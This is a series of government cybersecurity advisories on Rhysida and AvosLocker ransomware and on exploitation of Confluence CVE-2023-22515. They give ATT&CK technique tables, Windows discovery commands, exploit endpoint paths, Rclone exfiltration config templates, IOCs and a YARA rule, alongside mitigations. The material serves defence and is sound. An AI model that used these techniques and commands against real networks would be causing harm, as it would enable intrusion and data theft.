See Tables 6-15 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Additional notable TTPs have been published by the Check Point Incident Response Team.[11]

Table 6: Resource Development

Technique Title

ID

Use

Develop Capabilities

T1587

Rhysida actors have been observed developing resources and custom tools, particularly with program names set to “Rhysida-0.1” to gain access to victim systems.

Table 7: Initial Access

Technique Title

ID

Use

Valid Accounts

T1078

Rhysida actors are known to use valid credentials to access internal VPN access points of victims.

Exploit Public-Facing Application

T1190

Rhysida actors have been identified exploiting Zerologon, a critical elevation of privilege vulnerability within Microsoft’s Netlogon Remote Protocol.

Phishing

T1566

Rhysida actors are known to conduct successful phishing attacks.

Table 8: Execution

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

Rhysida actors used PowerShell commands (ipconfig, nltest, net) and various scripts to execute malicious actions.

Command and Scripting Interpreter: Windows Command Shell

T1059.003

Rhysida actors used batch scripting to place 1.ps1 on victim systems to automate ransomware execution.

Table 9: Privilege Escalation

Technique Title

ID

Use

Process Injection: Portable Executable Injection

T1055.002

Rhysida actors injected a Windows 64-bit PE cryptographic ransomware application into running processes on compromised systems.

Table 10: Defense Evasion

Technique Title

ID

Use

Indicator Removal: Clear Windows Event Logs

T1070.001

Rhysida actors used wevtutil.exe to clear Windows event logs, including system, application, and security logs.

Indicator Removal: File Deletion

T1070.004

Rhysida actors used PowerShell commands to delete binary strings.

Hide Artifacts: Hidden Window

T1564.003

Rhysida actors have executed hidden PowerShell windows.

Table 11: Credential Access

Technique Title

ID

Use

OS Credential Dumping: NTDS

T1003.003

Rhysida actors have been observed using secretsdump to extract credentials and other confidential information from a system, then dumping NTDS credentials.

Modify Registry

T1112

Rhysida actors were observed running registry modification commands via cmd.exe.

Table 12: Discovery

Technique Title

ID

Use

System Network Configuration Discovery

T1016

Rhysida actors used the ipconfig command to enumerate victim system network settings.

Remote System Discovery

T1018

Rhysida actors used the command net group “domain computers” /domain to enumerate servers on a victim domain.

System Owner/User Discovery

T1033

Rhysida actors leveraged whoami and various net commands within PowerShell to identify logged-in users.

Permission Groups Discovery: Local Groups

T1069.001

Rhysida actors used the command net localgroup administrators to identify accounts with local administrator rights.

Permission Groups Discovery: Domain Groups

T1069.002

Rhysida actors used the command net group “domain admins” /domain to identify domain administrators.

Account Discovery: Domain Account

T1087.002

Rhysida actors used the command net user [username] /domain to identify account information.

Domain Trust Discovery

T1482

Rhysida actors used the Windows utility nltest to enumerate domain trusts.

Table 13: Lateral Movement

Technique Title

ID

Use

Remote Services: Remote Desktop Protocol

T1021.001

Rhysida actors are known to use RDP for lateral movement.

Remote Services: SSH

T1021.004

Rhysida actors used compromised user credentials to leverage PuTTy and remotely connect to victim systems via SSH.

Table 14: Command and Control

Technique Title

ID

Use

Remote Access Software

T1219

Rhysida actors have been observed using the AnyDesk software to obtain remote access to victim systems and maintain persistence.

Table 15: Impact

Technique Title

ID

Use

Data Encrypted for Impact

T1486

Rhysida actors encrypted victim data using a 4096-bit RSA encryption key that implements a ChaCha20 algorithm.

Financial Theft

T1657

Rhysida actors reportedly engage in “double extortion”— demanding a ransom payment to decrypt victim data and threatening to publish the sensitive exfiltrated data unless the ransom is paid.

MITIGATIONS

FBI, CISA, and the MS-ISAC recommend that organizations implement the mitigations below to improve your organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

These mitigations apply to all critical infrastructure organizations and network defenders. FBI, CISA, and the MS-ISAC recommend incorporating secure-by-design and -default principles, limiting the impact of ransomware techniques and strengthening overall security posture. For more information on secure by design, see CISA’s Secure by Design webpage.

  • Require phishing-resistant MFA for all services to the extent possible, particularly for webmail, VPN, and accounts that access critical systems [CPG 2.H].
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.N].
  • Implement verbose and enhanced logging within processes such as command line auditing[12] and process tracking[13].
  • Restrict the use of PowerShell using Group Policy and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical operating system and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances (using the latest version) have module, script block, and transcription logging enabled (e.g., enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows event log and the PowerShell operational log. FBI, CISA, and the MS-ISAC recommend turning on these two Windows event logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
  • Restrict the use of RDP and other remote desktop services to known user accounts and groups. If RDP is necessary, apply best practices such as [CPG 2.W]:
    • Implement MFA for privileged accounts using RDP.
    • Use Remote Credential Guard[14] to protect credentials, particularly domain administrator or other high value accounts.
    • Audit the network for systems using RDP.
    • Close unused RDP ports.
    • Enforce account lockouts after a specified number of attempts.
    • Log RDP login attempts.
  • Secure remote access tools by:
    • Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important as antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Apply the recommendations in CISA's joint Guide to Securing Remote Access Software.

In addition, FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
  • Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E]. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support the enforcement of PoLP (as well as the zero trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the AD level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
  • Maintain offline backups of data and regularly maintain backups and their restoration (daily or weekly at minimum). By instituting this practice, organizations limit the severity of disruption to business operations [CPG 2.R].
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].
  • Forward log files to a hardened centralized logging server, preferably on a segmented network [CPG 2.F]. Review logging retention rates, such as for VPNs and network-based logs.
  • Consider adding an email banner to emails received from outside your organization [CPG 2.M].
  • Disable hyperlinks in received emails.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI, CISA, and the MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 6-15).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI, CISA, and the MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Rhysida actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details requested include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host and network-based indicators.

FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other threat actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3) at Ic3.gov, a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.

REFERENCES

  1. Microsoft: DEV-0832 (Vice Society) Opportunistic Ransomware Campaigns Impacting US Education Sector
  2. FortiGuard Labs: Ransomware Roundup - Rhysida
  3. Microsoft: Security Update Guide - CVE-2020-1472
  4. Microsoft: Master File Table (Local File Systems)
  5. SentinelOne: Rhysida
  6. Secplicity: Scratching the Surface of Rhysida Ransomware
  7. Cisco Talos: What Cisco Talos Knows about the Rhysida Ransomware
  8. SOC Radar: Rhysida Ransomware Threat Profile
  9. Sophos: A Threat Cluster’s Switch from Vice Society to Rhysida
  10. Sophos: Vice Society - Rhysida IOCs (GitHub)
  11. Check Point Research: Rhysida Ransomware - Activity and Ties to Vice Society
  12. Microsoft: Command Line Process Auditing
  13. Microsoft: Audit Process Tracking
  14. Microsoft: Remote Credential Guard

ACKNOWLEDGEMENTS

Sophos contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, and the MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, and the MS-ISAC.

VERSION HISTORY

November 15, 2023: Initial version.

October 13, 2023

Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks | CISA

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. Threat actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems and continue active exploitation post-patch. Atlassian has rated this vulnerability as critical; CISA, FBI, and MS-ISAC expect widespread, continued exploitation due to ease of exploitation.

CISA, FBI, and MS-ISAC strongly encourage network administrators to immediately apply the upgrades provided by Atlassian. CISA, FBI, and MS-ISAC also encourage organizations to hunt for malicious activity on their networks using the detection signatures and indicators of compromise (IOCs) in this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations.

For additional information on upgrade instructions, a complete list of affected product versions, and IOCs, see Atlassian’s security advisory for CVE-2023-22515.[1] While Atlassian’s advisory provides interim measures to temporarily mitigate known attack vectors, CISA, FBI, and MS-ISAC strongly encourage upgrading to a fixed version or taking servers offline to apply necessary updates.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

AA23-289A STIX XML (XML, 12.45 KB )
AA23-289A STIX JSON (JSON, 9.03 KB )

TECHNICAL DETAILS

Overview

CVE-2023-22515 is a critical Broken Access Control vulnerability affecting the following versions of Atlassian Confluence Data Center and Server. Note: Atlassian Cloud sites (sites accessed by an atlassian.net domain), including Confluence Data Center and Server versions before 8.0.0, are not affected by this vulnerability.

  • 8.0.0
  • 8.0.1
  • 8.0.2
  • 8.0.3
  • 8.0.4
  • 8.1.0
  • 8.1.1
  • 8.1.3
  • 8.1.4
  • 8.2.0
  • 8.2.1
  • 8.2.2
  • 8.2.3
  • 8.3.0
  • 8.3.1
  • 8.3.2
  • 8.4.0
  • 8.4.1
  • 8.4.2
  • 8.5.0
  • 8.5.1

Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. More specifically, threat actors can change the Confluence server’s configuration to indicate the setup is not complete and use the /setup/setupadministrator.action endpoint to create a new administrator user. The vulnerability is triggered via a request on the unauthenticated /server-info.action endpoint.

Considering the root cause of the vulnerability allows threat actors to modify critical configuration settings, CISA, FBI, and MS-ISAC assess that the threat actors may not be limited to creating new administrator accounts. Open source further indicates an Open Web Application Security Project (OWASP) classification of injection (i.e., CWE-20: Improper Input Validation) is an appropriate description.[2] Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day—a previously unidentified vulnerability.[1]

On October 5, 2023, CISA added this vulnerability to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation. Due to the ease of exploitation, CISA, FBI, and MS-ISAC expect to see widespread exploitation of unpatched Confluence instances in government and private networks.

Post-Exploitation: Exfiltration of Data

Post-exploitation exfiltration of data can be executed through of a variety of techniques. A predominant method observed involves the use of cURL—a command line tool used to transfer data to or from a server. An additional data exfiltration technique observed includes use of Rclone [S1040]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. Note: This does not preclude the effectiveness of alternate methods, but highlights methods observed to date. Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line. Example configuration file templates are listed in the following Figures 1 and 2, which are populated with the credentials of the exfiltration point:

[s3]
type =
env_auth =
access_key_id =
secret_access_key =
region = 
endpoint =  
location_constraint =
acl =
server_side_encryption =
storage_class =
[minio]
type =
provider =
env_auth =
access_key_id =
secret_access_key =
endpoint =
acl =

The following User-Agent strings were observed in request headers. Note: As additional threat actors begin to use this CVE due to the availability of publicly posted proof-of-concept code, an increasing variation in User-Agent strings is expected:

  • Python-requests/2.27.1
  • curl/7.88.1

Indicators of Compromise

Disclaimer: Organizations are recommended to investigate or vet these IP addresses prior to taking action, such as blocking.

The following IP addresses were obtained from FBI investigations as of October 2023 and observed conducting data exfiltration:

  • 170.106.106[.]16
  • 43.130.1[.]222
  • 152.32.207[.]23
  • 199.19.110[.]14
  • 95.217.6[.]16 (Note: This is the official rclone.org website)

Additional IP addresses observed sending related exploit traffic have been shared by Microsoft.[3]

DETECTION METHODS

Network defenders are encouraged to review and deploy Proofpoint’s Emerging Threat signatures. See Ruleset Update Summary - 2023/10/12 - v10438.[4]

Network defenders are also encouraged to aggregate application and server-level logging from Confluence servers to a logically separated log search and alerting system, as well as configure alerts for signs of exploitation (as detailed in Atlassian’s security advisory).

INCIDENT RESPONSE

Organizations are encouraged to review all affected Confluence instances for evidence of compromise, as outlined by Atlassian.[1] If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform any number of unfettered actions—these include but are not limited to exfiltration of content and system credentials, as well as installation of malicious plugins.

If a potential compromise is detected, organizations should:

  1. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
    • Note: Upgrading to fixed versions, as well as removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
    • Search and audit logs from Confluence servers for attempted exploitation.[2]
  2. Quarantine and take offline potentially affected hosts.
  3. Provision new account credentials.
  4. Reimage compromised hosts.
  5. Report the compromise to CISA via CISA’s 24/7 Operations Center ([email protected] or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov. State, local, tribal, and territorial governments should report incidents to the MS-ISAC ([email protected] or 866-787-4722).

MITIGATIONS

These mitigations apply to all organizations using non-cloud Atlassian Confluence Data Center and Server software. CISA, FBI, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices to reduce the prevalence of Broken Access Control vulnerabilities, thus strengthening the secure posture for their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

As of October 10, 2023, proof-of-concept exploits for CVE-2023-22515 have been observed in open source publications.[5] While there are immediate concerns such as increased risk of exploitation and the potential integration into malware toolkits, the availability of a proof-of-concept presents an array of security and operational challenges that extend beyond these immediate issues. Immediate action is strongly advised to address the potential risks associated with this development.

CISA, FBI, and MS-ISAC recommend taking immediate action to address the potential associated risks and encourage organizations to:

  • Immediately upgrade to fixed versions. See Atlassian’s upgrading instructions[6] for more information. If unable to immediately apply upgrades, restrict untrusted network access until feasible. Malicious cyber threat actors who exploit the affected instance can escalate to administrative privileges.
  • Follow best cybersecurity practices in your production and enterprise environments. While not observed in this instance of exploitation, mandating phishing-resistant multifactor authentication (MFA) for all staff and services can make it more difficult for threat actors to gain access to networks and information systems. For additional best practices, see:
    • CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures (TTPs). Because the CPGs are a subset of best practices, CISA recommends software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).
    • Center for Internet Security’s (CIS) Critical Security Controls. The CIS Critical Security Controls are a prescriptive, prioritized, and simplified set of best practices that organizations can use to strengthen cybersecurity posture and protect against cyber incidents.

RESOURCES

REFERENCES

[1]   Atlassian: CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server
[2]   Rapid7: CVE-2023-22515 Analysis
[3]   Microsoft: CVE-2023-22515 Exploit IP Addresses
[4]   Proofpoint: Emerging Threats Rulesets
[5]   Confluence CVE-2023-22515 Proof of Concept - vulhub
[6]   Atlassian Support: Upgrading Confluence

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA, FBI, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, FBI, and MS-ISAC.

VERSION HISTORY

October 16, 2023: Initial version.

October 13, 2023

#StopRansomware: AvosLocker Ransomware (Update) | CISA

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known IOCs, TTPs, and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023. AvosLocker operates under a ransomware-as-a-service (RaaS) model. AvosLocker affiliates have compromised organizations across multiple critical infrastructure sectors in the United States, affecting Windows, Linux, and VMware ESXi environments. AvosLocker affiliates compromise organizations’ networks by using legitimate software and open-source remote system administration tools. AvosLocker affiliates then use exfiltration-based data extortion tactics with threats of leaking and/or publishing stolen data.

This joint CSA updates the March 17, 2022, AvosLocker ransomware joint CSA, Indicators of Compromise Associated with AvosLocker ransomware, released by FBI and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN). This update includes IOCs and TTPs not included in the previous advisory and a YARA rule FBI developed after analyzing a tool associated with an AvosLocker compromise.

FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of AvosLocker ransomware and other ransomware incidents.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

AA23-284A STIX XML (XML, 46.67 KB )
AA23-284A STIX JSON (JSON, 34.50 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

AvosLocker affiliates use legitimate software and open-source tools during ransomware operations, which include exfiltration-based data extortion. Specifically, affiliates use:

  • Remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—as backdoor access vectors [T1133].
  • Scripts to execute legitimate native Windows tools [T1047], such as PsExec and Nltest.
  • Open-source networking tunneling tools [T1572] Ligolo[1] and Chisel[2].
  • Cobalt Strike and Sliver[3] for command and control (C2).
  • Lazagne and Mimikatz for harvesting credentials [T1555].
  • FileZilla and Rclone for data exfiltration.
  • Notepad++, RDP Scanner, and 7zip.

FBI has also observed AvosLocker affiliates:

  1. Use custom PowerShell [T1059.001] and batch (.bat) scripts [T1059.003] for lateral movement, privilege escalation, and disabling antivirus software.
  2. Upload and use custom webshells to enable network access [T1505.003].

For additional TTPs, see joint CSA Indicators of Compromise Associated with AvosLocker Ransomware.

Indicators of Compromise (IOCs)

See Tables 1 and 2 below for IOCs obtained from January 2023–May 2023.

Table 1: Files, Tools, and Hashes as of May 2023

Files and Tools

MD5

psscriptpolicytest_im2hdxqi.g0k.ps1

829f2233a1cd77e9ec7de98596cd8165

psscriptpolicytest_lysyd03n.o10.ps1

6ebd7d7473f0ace3f52c483389cab93f

psscriptpolicytest_1bokrh3l.2nw.ps1

10ef090d2f4c8001faadb0a833d60089

psscriptpolicytest_nvuxllhd.fs4.ps1

8227af68552198a2d42de51cded2ce60

psscriptpolicytest_2by2p21u.4ej.ps1

9d0b3796d1d174080cdfdbd4064bea3a

psscriptpolicytest_te5sbsfv.new.ps1

af31b5a572b3208f81dbf42f6c143f99

psscriptpolicytest_v3etgbxw.bmm.ps1

1892bd45671f17e9f7f63d3ed15e348e

psscriptpolicytest_fqa24ixq.dtc.ps1

cc68eaf36cb90c08308ad0ca3abc17c1

psscriptpolicytest_jzjombgn.sol.ps1

646dc0b7335cffb671ae3dfd1ebefe47

psscriptpolicytest_rdm5qyy1.phg.ps1

609a925fd253e82c80262bad31637f19

psscriptpolicytest_endvm2zz.qlp.ps1

c6a667619fff6cf44f447868d8edd681

psscriptpolicytest_s1mgcgdk.25n.ps1

3222c60b10e5a7c3158fd1cb3f513640

psscriptpolicytest_xnjvzu5o.fta.ps1

90ce10d9aca909a8d2524bc265ef2fa4

psscriptpolicytest_satzbifj.oli.ps1

44a3561fb9e877a2841de36a3698abc0

psscriptpolicytest_grjck50v.nyg.ps1

5cb3f10db11e1795c49ec6273c52b5f1

psscriptpolicytest_0bybivfe.x1t.ps1

122ea6581a36f14ab5ab65475370107e

psscriptpolicytest_bzoicrns.kat.ps1

c82d7be7afdc9f3a0e474f019fb7b0f7

Files and Tools

SHA256

BEACON.PS1

e68f9c3314beee640cc32f08a8532aa8dcda613543c54a83680c21d7cd49ca0f

Encoded PowerShell script

ad5fd10aa2dc82731f3885553763dfd4548651ef3e28c69f77ad035166d63db7  

Encoded PowerShell script

48dd7d519dbb67b7a2bb2747729fc46e5832c30cafe15f76c1dbe3a249e5e731  

Files and Tools

SHA1

PowerShell backdoor

2d1ce0231cf8ff967c36bbfc931f3807ddba765c

Table 2: Email Address and Virtual Currency Wallets

Email Address

keishagrey994@outlook[.]com

Virtual Currency Wallets

a6dedd35ad745641c52d6a9f8da1fb09101d152f01b4b0e85a64d21c2a0845ee

bfacebcafff00b94ad2bff96b718a416c353a4ae223aa47d4202cdbc31e09c92

418748c1862627cf91e829c64df9440d19f67f8a7628471d4b3a6cc5696944dd

bc1qn0u8un00nl6uz6uqrw7p50rg86gjrx492jkwfn

DETECTION

Based on an investigation by an advanced digital forensics group, FBI created the following YARA rule to detect the signature for a file identified as enabling malware. NetMonitor.exe is a malware masquerading as a legitimate process and has the appearance of a legitimate network monitoring tool. This persistence tool sends pings from the network every five minutes. The NetMonitor executable is configured to use an IP address as its command server, and the program communicates with the server over port 443. During the attack, traffic between NetMonitor and the command server is encrypted, where NetMonitor functions like a reverse proxy and allows actors to connect to the tool from outside the victim’s network.

YARA Rule

rule NetMonitor 
{
  meta:
    author = "FBI"
    source = "FBI"
    sharing = "TLP:CLEAR"
    status = "RELEASED"
    description = "Yara rule to detect NetMonitor.exe"
    category = "MALWARE"
    creation_date = "2023-05-05"
  strings:
    $rc4key = {11 4b 8c dd 65 74 22 c3}
    $op0 = {c6 [3] 00 00 05 c6 [3] 00 00 07 83 [3] 00 00 05 0f 85 [4] 83 [3] 00 00 01 75 ?? 8b [2] 4c 8d [2] 4c 8d [3] 00 00 48 8d [3] 00 00 48 8d [3] 00 00 48 89 [3] 48 89 ?? e8}
  condition:
    uint16(0) == 0x5A4D
    and filesize     and any of them
}

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 3-7 for all referenced threat actor tactics and techniques in this advisory.

Table 3: AvosLocker Affiliates ATT&CK Techniques for Initial Access

Initial Access

   

Technique Title

ID

Use

External Remote Services

T1133

AvosLocker affiliates use remote system administration tools—Splashtop Streamer, Tactical RMM, PuTTy, AnyDesk, PDQ Deploy, and Atera Agent—to access backdoor access vectors.

Table 4: AvosLocker Affiliates ATT&CK Techniques for Execution
Execution    

Technique Title

ID

Use

Command and Scripting Interpreter: PowerShell

T1059.001

AvosLocker affiliates use custom PowerShell scripts to enable privilege escalation, lateral movement, and to disable antivirus.

Command and Scripting Interpreter: Windows Command Shell

T1059.003

AvosLocker affiliates use custom .bat scripts to enable privilege escalation, lateral movement, and to disable antivirus. 

Windows Management Instrumentation

T1047

AvosLocker affiliates use legitimate Windows tools, such as PsExec and Nltest in their execution.

Table 5: AvosLocker Affiliates ATT&CK Techniques for Persistence

Persistence

   

Technique Title

ID

Use

Server Software Component

T1505.003

AvosLocker affiliates have uploaded and used custom webshells to enable network access.

Table 6: AvosLocker Affiliates ATT&CK Techniques for Credential Access

Credential Access

   

Technique Title

ID

Use

Credentials from Password Stores

T1555

AvosLocker affiliates use open-source applications Lazagne and Mimikatz to steal credentials from system stores.

Table 7: AvosLocker Affiliates ATT&CK Techniques for Command and Control

Command and Control

   

Technique Title

ID

Use

Protocol Tunneling

T1572

AvosLocker affiliates use open source networking tunneling tools like Ligolo and Chisel.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the secure posture for their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

FBI and CISA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise by AvosLocker ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Secure remote access tools by:
    • Implementing application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
    • Applying recommendations in CISA's joint Guide to Securing Remote Access Software.
  • Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Disable command-line and scripting activities and permissions [CPG 2.N].
  • Restrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.

Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.

In addition, FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
